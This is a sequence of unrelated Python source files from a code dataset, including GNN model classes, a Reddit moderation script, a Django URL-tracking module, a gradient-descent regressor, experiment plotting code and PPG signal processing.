torch.nn.ModuleList()\n\n for i in range(0, conv_count):\n if i == 0:\n meg = megnet_block\n e_embed = Sequential(\n Linear(data.num_edge_features, dim1), ReLU(), Linear(dim1, dim2)\n )\n x_embed = Sequential(Linear(dim1, dim1), ReLU(), Linear(dim1, dim2))\n u_embed = Sequential(\n Linear((data[0].u.shape[1]), dim1), ReLU(), Linear(dim1, dim2)\n )\n self.e_embed_list.append(e_embed)\n self.x_embed_list.append(x_embed)\n self.u_embed_list.append(u_embed)\n self.meg_list.append(meg)\n elif i > 0:\n meg = megnet_block\n e_embed = Sequential(Linear(dim2, dim1), ReLU(), Linear(dim1, dim2))\n x_embed = Sequential(Linear(dim2, dim1), ReLU(), Linear(dim1, dim2))\n u_embed = Sequential(Linear(dim2, dim1), ReLU(), Linear(dim1, dim2))\n self.e_embed_list.append(e_embed)\n self.x_embed_list.append(x_embed)\n self.u_embed_list.append(u_embed)\n self.meg_list.append(meg)\n\n if self.pool == \"set2set\":\n self.set2set_x = Set2Set(dim2, processing_steps=3)\n self.set2set_e = Set2Set(dim2, processing_steps=3)\n self.lin1 = torch.nn.Linear(dim2 * 5, dim3)\n\n else:\n self.lin1 = torch.nn.Linear(dim2 * 3, dim3)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim3, dim3) for i in range(fc_count)]\n )\n self.lin2 = torch.nn.Linear(dim3, 1)\n\n def forward(self, data):\n\n x = F.relu(self.lin0(data.x))\n\n for i in range(0, len(self.meg_list)):\n\n if i == 0:\n e_temp = self.e_embed_list[i](data.edge_attr)\n x_temp = self.x_embed_list[i](x)\n u_temp = self.u_embed_list[i](data.u)\n x_out, e_out, u_out = self.meg_list[i](\n x_temp, data.edge_index, e_temp, u_temp, 
data.batch\n )\n x = torch.add(x_out, x_temp)\n e = torch.add(e_out, e_temp)\n u = torch.add(u_out, u_temp)\n\n elif i > 0:\n e_temp = self.e_embed_list[i](e)\n x_temp = self.x_embed_list[i](x)\n u_temp = self.u_embed_list[i](u)\n x_out, e_out, u_out = self.meg_list[i](\n x_temp, data.edge_index, e_temp, u_temp, data.batch\n )\n x = torch.add(x_out, x)\n e = torch.add(e_out, e)\n u = torch.add(u_out, u)\n\n if self.pool == \"set2set\":\n x_pool = self.set2set_x(x, data.batch)\n # not exactly same as original, extra scatter operation to go from edge to node index\n e = scatter(e, data.edge_index[0, :], dim=0, reduce=\"mean\")\n e_pool = self.set2set_e(e, data.batch)\n comb_pool = torch.cat([x_pool, e_pool, u], dim=1)\n\n else:\n x_pool = scatter(x, data.batch, dim=0, reduce=self.pool)\n e_pool = scatter(e, data.edge_index[0, :], dim=0, reduce=self.pool)\n e_pool = scatter(e_pool, data.batch, dim=0, reduce=self.pool)\n comb_pool = torch.cat([x_pool, e_pool, u], dim=1)\n\n out = F.relu(self.lin1(comb_pool))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n\n return out.view(-1)\n\n\n# Sine matrix with neural network\nclass SM(torch.nn.Module):\n def __init__(self, data, dim1, fc_count, **kwargs):\n super(SM, self).__init__()\n\n self.lin1 = torch.nn.Linear(data[0].extra_features_SM.shape[1], dim1)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim1, dim1) for i in range(fc_count)]\n )\n\n self.lin2 = torch.nn.Linear(dim1, 1)\n\n def forward(self, data):\n\n out = F.relu(self.lin1(data.extra_features_SM))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n return out.view(-1)\n\n\n# Smooth Overlap of Atomic Positions with neural network\nclass SOAP(torch.nn.Module):\n def __init__(self, data, dim1, fc_count, **kwargs):\n super(SOAP, self).__init__()\n\n self.lin1 = torch.nn.Linear(data[0].extra_features_SOAP.shape[1], dim1)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim1, dim1) for i in range(fc_count)]\n )\n\n self.lin2 = torch.nn.Linear(dim1, 1)\n\n def forward(self, data):\n\n out = F.relu(self.lin1(data.extra_features_SOAP))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n return out.view(-1)\n\n\n# Prints model summary\ndef model_summary(model):\n model_params_list = list(model.named_parameters())\n print(\"--------------------------------------------------------------------------\")\n line_new = \"{:>30} {:>20} {:>20}\".format(\n \"Layer.Parameter\", \"Param Tensor Shape\", \"Param #\"\n )\n print(line_new)\n print(\"--------------------------------------------------------------------------\")\n for elem in model_params_list:\n p_name = elem[0]\n p_shape = list(elem[1].size())\n p_count = torch.tensor(elem[1].size()).prod().item()\n line_new = \"{:>30} {:>20} {:>20}\".format(p_name, str(p_shape), str(p_count))\n print(line_new)\n print(\"--------------------------------------------------------------------------\")\n total_params = sum([param.nelement() for param in model.parameters()])\n print(\"Total params:\", total_params)\n num_trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(\"Trainable params:\", num_trainable_params)\n print(\"Non-trainable params:\", total_params - num_trainable_params)\n","sub_path":"matdeeplearn/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"337425403","text":"from 
datetime import datetime, timedelta\n\nfrom praw import Reddit\n# from praw.exceptions import RedditAPIException\n\nr = Reddit('bot2')\n\nUNCLAIMED = 'Unclaimed'\nIN_PROGRESS = 'In Progress'\n\n\ndef remove_old_crap(posts):\n for item in posts:\n if item.link_flair_text == UNCLAIMED:\n submission_time = datetime.fromtimestamp(item.created_utc)\n if submission_time < current_time - timedelta(days=1):\n print(f\"Removing {item.name}, posted on {str(submission_time)}\")\n item.mod.remove()\n\n\nif __name__ == '__main__':\n current_time = datetime.now()\n for x in range(30):\n # I know for a fact that sometimes reddit will only show 4 posts on the page,\n # but each one of these options will only pull one of them. Just ask for all\n # of them, smash them together, and process.\n submissions = list(r.subreddit(\"transcribersofreddit\").hot(limit=None))\n submissions += list(r.subreddit(\"transcribersofreddit\").new(limit=None))\n submissions += list(r.subreddit(\"transcribersofreddit\").top(limit=None))\n submissions += list(r.subreddit(\"transcribersofreddit\").controversial(limit=None))\n remove_old_crap(submissions)\n\n # try:\n # item.reply(\n # \"This submission has been open for at least three days and is listed as in progress\"\n # \" -- it has been removed to make room for other submissions in the queue. Please contact\"\n # \" itsthejoker if there is an issue.\"\n # )\n # except RedditAPIException:\n # pass\n","sub_path":"scripts/clear_submissions_from_queue.py","file_name":"clear_submissions_from_queue.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"612825160","text":"import pandas as pd\nimport numpy as np\n\ndef load_rating(ncivs: int, bans):\n rating = pd.read_csv('civ_random/rating.csv')\n cols = rating.columns\n\n for col in cols[1:]:\n for i in range(len(rating[col])):\n try:\n rat_val = rating[col].loc[i]\n rat_val = rat_val.replace(\" \", \"\").split(sep = ',')\n # assign through DataFrame.loc so the update hits the frame itself,\n # not a possibly temporary copy from chained indexing\n rating.loc[i, col] = np.average([int(x) for x in rat_val])\n except ValueError:\n print('Incorrect value. 
Please, check the table.')\n\n total_rat = []\n\n for i in range(len(rating[cols[0]])):\n total_rat.append(\n rating[cols[1]].loc[i] +\n rating[cols[2]].loc[i] +\n 2 * rating[cols[3]].loc[i] +\n rating[cols[4]].loc[i]\n )\n\n rating['AVERAGE'] = total_rat\n rating = rating.sort_values(by=['AVERAGE'])\n rating = rating[~rating['Нація'].isin(bans)]\n rat_group = np.array_split(rating, ncivs)\n\n for i in range(len(rat_group)):\n rat_group[i]['POINTS'] = [i+1 for el in range(rat_group[i].shape[0])]\n\n return(pd.concat(rat_group))\n\ndef balanced_random(pl_num:int, ncivs:int, bans):\n rand_civs = [[] for i in range(pl_num)]\n rating = load_rating(ncivs, bans)\n\n for player in rand_civs:\n to_random = ncivs\n player_points = np.sum(np.arange(ncivs + 1))\n\n while to_random:\n if to_random == 1:\n rand_df = rating[\n (rating['POINTS'].values <= player_points) &\n (rating['POINTS'].values >= player_points // to_random)\n ]\n nation = rand_df.sample(n=1)\n rating = rating.drop(nation.index)\n player.append(nation['Нація'].values[0] + '.jpg')\n to_random -= 1\n\n else:\n # print(player_points-to_random+1)\n rand_df = rating[\n (rating['POINTS'].values <= player_points-to_random+1) &\n (rating['POINTS'].values >= player_points//to_random)\n ]\n nation = rand_df.sample(n=1)\n rating = rating.drop(nation.index)\n player.append(nation['Нація'].values[0] + '.jpg')\n to_random -= 1\n player_points -= nation['POINTS'].values[0]\n\n return rand_civs\n\n\n","sub_path":"civ_random/balanced_random.py","file_name":"balanced_random.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"620135815","text":"import logging\nimport warnings\n\nfrom django.db.models import signals\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.core.urlresolvers import NoReverseMatch\n\nfrom .models import URLChangeRecord\nfrom .mixins import URLTrackingMixin\n\nlogger = logging.getLogger(__file__)\n\n\nclass URLTrackingError(Exception):\n \"\"\"\n Exception raised when an error occures during URL tracking.\n \"\"\"\n pass\n\n\ndef lookup_previous_url(instance, **kwargs):\n \"\"\"\n Look up the absolute URL of *instance* from the database while it is\n in a ``pre_save`` state. The previous URLs are saved in the instance's\n *_old_urls* attribute as dictionary. The method name for the given URLs\n are used as the dictionary keys.\n\n If the instance has not been saved to the database (i.e. is new)\n the ``_old_urls`` dictionary is set to ``{}`` which will prevent a record\n to be created.\n \"\"\"\n instance._old_urls = {}\n for method_name in instance.get_url_tracking_methods():\n try:\n method = getattr(instance, method_name)\n except AttributeError:\n raise ImproperlyConfigured(\n \"model instance '%s' does not have a method '%s'\" % (\n instance.__class__.__name__,\n method_name\n )\n )\n try:\n old_url = method()\n except NoReverseMatch:\n logger.debug(\"Method's URL doesn't resolve\")\n old_url = None\n instance._old_urls[method_name] = old_url\n\n\ndef _create_delete_record(url):\n \"\"\"\n Create a delete record for the given *url*. This updates all records\n where *url* is the ``new_url`` (previous redirects). It also creates\n a new record with *url* being the ``old_url`` and no ``new_url`` and\n marked as deleted. This marks an endpoint in the chain of URL\n redirects.\n \"\"\"\n # updated existing records with the old URL being the new_url\n # of this record. 
Changed the *deleted* flag to be ``False``\n URLChangeRecord.objects.filter(new_url=url).update(\n new_url='',\n deleted=True\n )\n\n record, __ = URLChangeRecord.objects.get_or_create(old_url=url)\n record.deleted = True\n record.save()\n\n\ndef track_changed_url(instance, **kwargs):\n \"\"\"\n Track a URL changes for *instance* after a new instance was saved. If\n no old URLs are available (i.e. *instance* is new) or if a new and old URL\n are the same (i.e. URL is unchanged), nothing will be changed in the\n database for this URL.\n\n For URLs that have changed, the database will be checked for existing\n records that have a *new_url* entry equal to the old URL of *instance* and\n updates these records. Then, a new ``URLChangeRecord`` is created for this\n URL.\n \"\"\"\n for method_name, old_url in getattr(instance, '_old_urls', {}).items():\n try:\n new_url = getattr(instance, method_name)()\n except NoReverseMatch:\n new_url = None\n\n # we don't want to store URL changes for unchanged URL\n if not old_url or (old_url == new_url):\n continue\n\n # if the new URL is None we assume that it has been deleted and\n # create a delete record for the old URL.\n if not new_url:\n _create_delete_record(old_url)\n continue\n\n logger.debug(\n \"tracking URL change for instance '%s' URL\",\n instance.__class__.__name__\n )\n\n # check if the new URL is already in the table and\n # remove these entries\n URLChangeRecord.objects.filter(old_url=new_url).delete()\n\n # updated existing records with the old URL being\n # the new URL in the record\n url_records = URLChangeRecord.objects.filter(new_url=old_url).update(\n new_url=new_url,\n deleted=False\n )\n\n # create a new/updated record for this combination of old and\n # new URL. If the record already exists, it is assumed that the\n # current change is to be used and the existing new_url will be\n # detached from the old_url.\n\n record, __ = URLChangeRecord.objects.get_or_create(old_url=old_url)\n record.new_url = new_url\n record.deleted = False\n record.save()\n\ndef track_deleted_url(instance, **kwargs):\n \"\"\"\n Track the URL of a deleted *instance*. It updates all existing\n records with ``new_url`` being set to the *instance*'s old URL and\n marks this record as deleted URL.\n\n A new ``URLChangeRecord`` is created for the old URL of *instance*\n that is marked as deleted.\n \"\"\"\n logger.debug(\"tracking deleted instance '%s' URL\",\n instance.__class__.__name__)\n for old_url in getattr(instance, '_old_urls', {}).values():\n _create_delete_record(old_url)\n\n\ndef track_url_changes_for_model(model, absolute_url_method='get_absolute_url'):\n \"\"\"\n Register the *model* for URL tracking. 
It requires the *model* to provide\n an attribute ``url_tracking_methods`` and/or a ``get_url_tracking_methods``\n method to return a list of methods to retrieve trackable URLs.\n The default setup provides ``url_tracking_methods = ['get_absolute_url']``.\n\n The ``pre_save``, ``post_save`` and ``post_delete`` methods are connected\n to different tracking methods for *model* and create/update\n ``URLChangeRecord``s as required.\n \"\"\"\n if not hasattr(model, 'get_url_tracking_methods'):\n warnings.warn(\n \"the 'absolute_url_method' is deprecated, use the \"\n \"'UrlTrackingMixin' instead\",\n PendingDeprecationWarning\n )\n model.url_tracking_methods = [absolute_url_method]\n model.get_url_tracking_methods = URLTrackingMixin.get_url_tracking_methods\n\n # make sure that URL method names are specified for the given model\n if not getattr(model, 'url_tracking_methods', None):\n raise URLTrackingError(\"no URLs specified for model '%s'\" % model)\n\n signals.pre_save.connect(lookup_previous_url, sender=model, weak=False)\n signals.post_save.connect(track_changed_url, sender=model, weak=False)\n signals.post_delete.connect(track_deleted_url, sender=model, weak=False)\n","sub_path":"url_tracker/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"239989643","text":"from typing import Optional\n\nimport numpy as np\nfrom numpy.testing import assert_array_almost_equal\nfrom sklearn.base import BaseEstimator, RegressorMixin\n\n\nclass GDLinearRegression(BaseEstimator, RegressorMixin):\n \"\"\"\n Similar to sklearn.linear_model.SGDRegressor with default parameters (and learning_rate=='constant')\n for everything not exposed in GDLinearRegression.__init__, but optimized with\n full-batch gradient descent instead of the stochastic updates used by SGDRegressor\n \"\"\"\n\n def __init__(self,\n penalty: Optional[str] = 'l2',\n l1_ratio: float = 0.15,\n alpha: float = 0.00001,\n fit_intercept: bool = True,\n max_iter: int = 10000,\n tol: float = 1e-3,\n eta0: float = 0.01,\n random_state: Optional[int] = None):\n # fall back to a fixed seed when no random_state is given\n self.random_state = 648 if random_state is None else random_state\n self.rnd_gen = np.random.default_rng(self.random_state)\n self.penalty = penalty\n self.l1_ratio = l1_ratio\n self.fit_intercept = fit_intercept\n self.learning_rate = eta0\n self.alpha = alpha\n self.max_iter = max_iter\n self.tol = tol\n\n def fit(self, X, y):\n \"\"\"\n Fit model using gradient descent method\n :param X: training data\n :param y: target values for training data\n :return: self\n \"\"\"\n if self.fit_intercept:\n X = np.hstack((np.ones(X.shape[0]).reshape(-1, 1), X))\n self.w_ = self.rnd_gen.normal(size=X.shape[1])\n for _ in range(self.max_iter):\n grad = self._grad_loss_func(X, y)\n self.w_ -= grad * self.learning_rate\n if np.sum(np.abs(grad)) < self.tol:\n break\n if self.fit_intercept:\n self.coef_ = self.w_[1:]\n self.intercept_ = self.w_[0:1]\n else:\n self.coef_ = self.w_\n return self\n\n def predict(self, X):\n \"\"\"\n Predict using model.\n :param X: test data to predict on\n :return: y_test: predicted values\n \"\"\"\n try:\n if self.fit_intercept:\n X = np.hstack((np.ones(X.shape[0]).reshape(-1, 1), X))\n return np.dot(X, self.w_)\n except AttributeError:\n raise Exception(\"Model is not fitted\")\n\n def _grad_loss_func(self, X, y):\n grad = (-2*np.dot(y.T, X) + 2*np.dot(self.w_.T,\n np.matmul(X.T, X))) / X.shape[0]\n # penalty names are compared in lowercase, matching the __init__ default\n if self.penalty == 'l1':\n grad += self.l1_penalty()\n elif self.penalty == 'l2':\n grad += self.l2_penalty()\n elif self.penalty == 'elasticnet':\n # elastic net blends both terms using l1_ratio\n grad += self.l1_ratio * self.l1_penalty() + (1 - self.l1_ratio) * self.l2_penalty()\n\n return grad\n\n def l1_penalty(self):\n # gradient of the L1 regularization term with respect to the weights\n return self.alpha * np.sign(self.w_)\n\n def l2_penalty(self):\n # gradient of the L2 regularization term with respect to the weights\n return self.alpha * 2 * self.w_\n\n\nif __name__ == \"__main__\":\n from sklearn.linear_model import SGDRegressor\n from sklearn.datasets import make_regression\n\n X, y = make_regression()\n\n gd_reg = GDLinearRegression().fit(X, y)\n sgd_reg = SGDRegressor(learning_rate='constant').fit(X, y)\n\n assert gd_reg.coef_.shape == sgd_reg.coef_.shape\n assert gd_reg.intercept_.shape == sgd_reg.intercept_.shape\n\n from sklearn.metrics import mean_squared_error as mse\n\n assert mse(y, gd_reg.predict(X)) <= mse(y, sgd_reg.predict(X))\n","sub_path":"homeworks/SGDRegressor/src/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"372598331","text":"\"\"\"\nencoding=utf-8\n_author = youzipi\ndate = 18/7/20\n\"\"\"\n\n\"\"\"\n Contains Duplicate\nGiven an integer array, determine whether it contains any duplicate element.\n\nThe function returns true if any value appears in the array at least twice, and false if every element is distinct.\n\nExample 1:\n\nInput: [1,2,3,1]\nOutput: true\nExample 2:\n\nInput: [1,2,3,4]\nOutput: false\nExample 3:\n\nInput: [1,1,1,3,3,4,3,2,4,2]\nOutput: true\n\n\"\"\"\n\n\nclass Solution:\n def containsDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n uniques = {}\n for i in nums:\n if uniques.get(i) is None:\n uniques.update({i: 1})\n else:\n return True\n return False\n\n def containsDuplicate1(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n return len(nums) != len(set(nums))\n\n\nif __name__ == '__main__':\n s = Solution()\n result = s.containsDuplicate([1, 1, 1, 3, 3, 4, 3, 2, 4, 2])\n result1 = s.containsDuplicate1([1, 1, 1, 3, 3, 4, 3, 2, 4, 2])\n print(result)\n print(result1)\n","sub_path":"leetcode/array/containsDuplicate.py","file_name":"containsDuplicate.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"212011593","text":"from hash_lib import hash_new_block, hash_string\nfrom wallet import Wallet\n\n\nclass Verifier:\n\n \"\"\"\n Checks validity of blockchain by checking if previous hash of block matches the next\n\n Also checks for invalid proof of work in any of the blocks\n\n Returns True if the chain is valid\n \"\"\"\n @classmethod\n def verify_blockchain(self, blockchain):\n for (index, block) in enumerate(blockchain):\n # if genesis block continue\n if index == 0:\n continue\n\n # check previous hashes match for each block and preceding block\n if block.previous_hash != hash_new_block(blockchain[index - 1]):\n return False\n\n # check for each block that the proof of work is valid\n if not self.valid_proof_of_work(block.transactions[:-1], block.previous_hash, block.proof):\n return False\n return True\n\n \"\"\"\n Verifies user has enough coins to proceed with transaction\n \"\"\"\n @staticmethod\n def verify_transaction(transaction, get_user_balance, check_funds=True):\n if check_funds:\n # verify user has enough funds and transaction data is valid\n sender_balance = get_user_balance(transaction.sender)\n return sender_balance >= transaction.amount and Wallet.verify_transaction(transaction)\n else:\n # return transaction data valid\n return Wallet.verify_transaction(transaction)\n\n \"\"\"\n loops through all open transactions and checks that each transaction is valid\n \"\"\"\n @classmethod\n 
def verify_transactions(self, open_transactions, get_user_balance):\n # verify each transaction without re-checking funds;\n # fail as soon as a single transaction is invalid\n for tx in open_transactions:\n if not self.verify_transaction(tx, get_user_balance, False):\n return False\n return True\n\n \"\"\"\n valid_proof_of_work\n\n returns True if the guess hash satisfies the proof of work difficulty target\n \"\"\"\n @staticmethod\n def valid_proof_of_work(transactions, last_hash, proof_number):\n # create a guess string using transactions, last_hash and each proof number passed in from loop\n guess = (str([tx.to_ordered_dict() for tx in transactions]) + str(last_hash) +\n str(proof_number)).encode('utf8')\n # hash the string using hash lib method\n guess_hash = hash_string(guess)\n\n # if guess hash begins with two leading 00's hash considered valid and proof number sufficient\n # hashes with leading 0's considered hard to compute\n return guess_hash[0:2] == '00'\n","sub_path":"Server/Flask/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"364696493","text":"from evaluation import *\n\ndef plot(distances, legend_labels=None):\n print('Intrinsic plasticity: Plot')\n \n # distances: runs, models, h_ip, test chunks\n last_chunk = np.shape(distances)[3]-1\n #num_hip = np.shape(distances)[2]\n num_models = np.shape(distances)[1]\n \n dists_mean = np.mean(distances[:,:,:,last_chunk], axis=0)\n dists_std = np.std(distances[:,:,:,last_chunk], axis=0)\n # dists: models, h_ip\n \n num_hip = np.shape(dists_mean)[1]\n \n cols = cm.rainbow(np.linspace(0, 1, num_hip))\n \n lab = '$c_{IP}$' if legend_labels is None else legend_labels\n \n for i in range(num_hip):\n legend = lab + ' = ' + str(PARA.c[ip][i])\n plt.errorbar(np.arange(num_models)+1, dists_mean[:,i], label=legend, yerr=dists_std[:,i], marker='o', # fmt='o',\n color=cols[i], ecolor=np.append(cols[i][0:3], 0.5))\n\n plt.legend(prop={'size': LEGEND_SIZE})\n plt.xlim(xmin=0.5, xmax=num_models+0.5)\n plt.ylim(ymin=0)\n plt.xlabel('Model', color=FIG_COLOR)\n plt.ylabel('Transition error', color=FIG_COLOR)\n plt.savefig(PLOTPATH + '/h_ip.'+FILE_TYPE, format=FILE_TYPE, transparent=True)\n plt.close()\n \n \n plt.errorbar(PARA.c[ip], dists_mean[0,:], yerr=np.std(distances[:,0,:,last_chunk], axis=0), fmt='o')\n plt.xlim(xmin=np.min(PARA.c[ip])-0.5, xmax=np.max(PARA.c[ip])+0.5)\n plt.ylim(ymin=0)\n plt.xlabel('IP factor', color=FIG_COLOR)\n plt.ylabel('Transition error', color=FIG_COLOR)\n plt.savefig(PLOTPATH + '/h_ip_model1.'+FILE_TYPE, format=FILE_TYPE, transparent=True)\n plt.close()\n \n # t-Tests\n file = \"\"\n for i in range(num_hip):\n for j in range(num_hip):\n if j > i:\n res = scipy.stats.ttest_ind(distances[:,0,i,last_chunk], distances[:,0,j,last_chunk])\n file += \"c_IP \"+str(PARA.c[ip][i])+\" vs. 
\"+str(PARA.c[ip][j])+\": t=\"+str(res[0])+\", p=\"+str(res[1])+\"\\n\"\n text_file = open(PLOTPATH + \"/t-tests_h_ip_factor.txt\", \"w\")\n text_file.write(file)\n text_file.close()\n\ndef plot_activity(activity):\n print('Intrinsic plasticity: Plot activity')\n \n # activity: runs, models, h_ip, test chunks\n last_chunk = np.shape(activity)[3]-1\n #num_hip = np.shape(activity)[2]\n num_models = np.shape(activity)[1]\n \n act_mean = np.mean(activity[:,0,:,last_chunk], axis=0)\n act_std = np.std(activity[:,0,:,last_chunk], axis=0)\n # act: h_ip\n \n num_hip = np.shape(act_mean)[0]\n \n plt.bar(PARA.c[ip]-0.125, act_mean, 0.25, linewidth=0, yerr=act_std)\n plt.xlim(xmin=np.min(PARA.c[ip])-0.5, xmax=np.max(PARA.c[ip])+0.5)\n plt.ylim(ymin=0)\n plt.xlabel('IP factor', color=FIG_COLOR)\n plt.ylabel('Average activity', color=FIG_COLOR)\n plt.savefig(PLOTPATH + '/h_ip_activity_model1.'+FILE_TYPE, format=FILE_TYPE, transparent=True)\n plt.close()\n","sub_path":"michaelis/evaluation/ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"147490416","text":"from tensorflow import keras\r\n\r\nname = 'test_1'\r\nepochs = 20\r\nbatch_size = 32\r\nimg_dim = 128\r\nlatent_dim = 128\r\nbeta = 1.0\r\nlearning_rate = 0.0001\r\noptimizer = keras.optimizers.Adam(learning_rate=learning_rate)\r\n\r\ndemo_iterations = 100\r\ndemo_directory = f'./demo_{name}/'\r\n","sub_path":"hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"561692578","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport struct\nfrom PyEMD import EMD\nfrom detect_peaks import detect_peaks\n#from pypeaks import Data, Intervals\n\n\nPIXART_PPG_DATA = \"./Pixart_PPG/ytchen_rest_1.txt\"\nINFINITI_PPG_DATA = \"./Infiniti_PPG/ytchen_rest_1.txt\"\n\npixart_ppg_data_list = []\ninfiniti_ppg_data_list = []\ncounter_line = 0\n\nwith open(PIXART_PPG_DATA) as f:\n for line in f:\n \tif line[0:3] == \"PPG\":\n \t\tdatas = line.strip(', \\n').split(',')\n \t\tdatas = datas[3:]\n \t\tdatas = [float(i) for i in datas]\n \t\tfor data in datas:\n \t\t\tpixart_ppg_data_list.append(data)\n\npixart_ppg_data_list = pixart_ppg_data_list[::2]\n\nemd = EMD()\n\nIMFs = emd(np.array(pixart_ppg_data_list))\nN = IMFs.shape[0]+1\nEMD_Pixart_PPG_9 = IMFs[0] + IMFs[1] + IMFs[2] + IMFs[3] + IMFs[4] + IMFs[5] + IMFs[6] + IMFs[7] + IMFs[8]\nEMD_Pixart_PPG_8 = IMFs[0] + IMFs[1] + IMFs[2] + IMFs[3] + IMFs[4] + IMFs[5] + IMFs[6] + IMFs[7]\nEMD_Pixart_PPG_10 = IMFs[0] + IMFs[1] + IMFs[2] + IMFs[3] + IMFs[4] + IMFs[5] + IMFs[6] + IMFs[7] + IMFs[8] + IMFs[9] \n\nprint(\"Number of IMF is {:d}\".format(N))\n\n# plt.plot(pixart_ppg_data_list[1000:5000])\n# plt.ylabel('magnitude')\n# plt.xlabel('sample')\n# plt.show()\n\n# plt.subplot(4,1,1)\n# plt.plot(pixart_ppg_data_list[1000:5000])\n# plt.ylabel('magnitude')\n# plt.xlabel('sample')\n\n\n# plt.subplot(4,1,2)\n# plt.plot(EMD_Pixart_PPG_8[1000:5000], 'g')\n# plt.title(\"EMD_8_IMFs\")\n# plt.xlabel(\"Sample\")\n# axes = plt.gca()\n# axes.set_xlim([0,len(pixart_ppg_data_list[1000:5000])])\n# axes.set_ylim([np.amin(EMD_Pixart_PPG_8[1000:5000]),np.amax(EMD_Pixart_PPG_8[1000:5000])])\n\n# plt.subplot(4,1,3)\n# plt.plot(EMD_Pixart_PPG_9[1000:5000], 'g')\n# plt.title(\"EMD_9_IMFs\")\n# plt.xlabel(\"Sample\")\n# axes = plt.gca()\n# 
axes.set_xlim([0,len(pixart_ppg_data_list[1000:5000])])\n# axes.set_ylim([np.amin(EMD_Pixart_PPG_9[1000:5000]),np.amax(EMD_Pixart_PPG_9[1000:5000])])\n\n# plt.subplot(4,1,4)\n# plt.plot(EMD_Pixart_PPG_10[1000:5000], 'g')\n# plt.title(\"EMD_10_IMFs\")\n# plt.xlabel(\"Sample\")\n# axes = plt.gca()\n# axes.set_xlim([0,len(pixart_ppg_data_list[1000:5000])])\n# axes.set_ylim([np.amin(EMD_Pixart_PPG_10[1000:5000]),np.amax(EMD_Pixart_PPG_10[1000:5000])])\n\n# plt.tight_layout()\n# #plt.savefig('simple_example')\n# plt.show()\n\nind = detect_peaks(EMD_Pixart_PPG_8[1000:5000],mph=0, mpd=60, show=False)\nind = ind[1:-1] * (1/100) #sampling rate of 100 Hz\nind_dif = np.subtract(ind[1:],ind[:-1])\nprint (ind_dif)\nmean_ind = np.mean(ind_dif)\nprint(\"Mean HR of Pixart PPG is {:f}\".format(mean_ind))\nvar_ind = np.var(ind_dif)\nprint(\"Var HR of Pixart PPG is {:f}\".format(var_ind))\n#print (pixart_ppg_data_list)\n#print (len(pixart_ppg_data_list))\n\n# plt.plot(pixart_ppg_data_list)\n# plt.ylabel('magnitude')\n# plt.xlabel('sample')\n# plt.show()\n\ncounter_line = 0\nwith open(INFINITI_PPG_DATA, 'rb') as f:\n\tfor line in f:\n\t\tif counter_line > 7:\n\t\t\tdatas = line.strip(b'\\r\\n').split(b',')\n\t\t\tinfiniti_ppg_data_list.append(float(datas[1].decode(\"utf-8\")))\n\t\tcounter_line = counter_line + 1\n\n#print (infiniti_ppg_data_list)\n#print (len(infiniti_ppg_data_list))\n\ninfiniti_ppg_data_list = infiniti_ppg_data_list[20480:102400]\n# plt.plot(infiniti_ppg_data_list)\n# plt.ylabel('magnitude')\n# plt.xlabel('sample')\n# axes = plt.gca()\n# axes.set_xlim([0,len(infiniti_ppg_data_list)])\n# plt.show()\n\nind2 = detect_peaks(np.array(infiniti_ppg_data_list),mph=0, mpd=1200, show=False)\nind2 = ind2[1:-1] * (1/2048) #sampling rate of 2048 Hz\nind_dif2 = np.subtract(ind2[1:],ind2[:-1])\nprint (ind_dif2)\nmean_ind2 = np.mean(ind_dif2)\nprint(\"Mean HR of Infiniti PPG is {:f}\".format(mean_ind2))\nvar_ind2 = np.var(ind_dif2)\nprint(\"Var HR of Infiniti PPG is {:f}\".format(var_ind2))","sub_path":"PPG/raw_data_parse.py","file_name":"raw_data_parse.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
